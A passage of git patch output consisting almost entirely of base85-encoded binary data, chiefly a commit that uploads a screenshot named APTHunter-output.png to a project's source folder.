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 I2ga}d4`o1DsQ>@~ literal 0 HcmV?d00001 -- 2.34.1 From ff566d5f719e398bf8355a0e1dc46a851c6438db Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:45:08 +0800 Subject: [PATCH 12/13] ADD file via upload --- source/screenshot/APTHunter-output.png | Bin 0 -> 227638 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/screenshot/APTHunter-output.png diff --git a/source/screenshot/APTHunter-output.png b/source/screenshot/APTHunter-output.png new file mode 100644 index 0000000000000000000000000000000000000000..2ce4dd09d7d895ac1a7aed983adee6d78b7070f6 GIT binary patch literal 227638 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 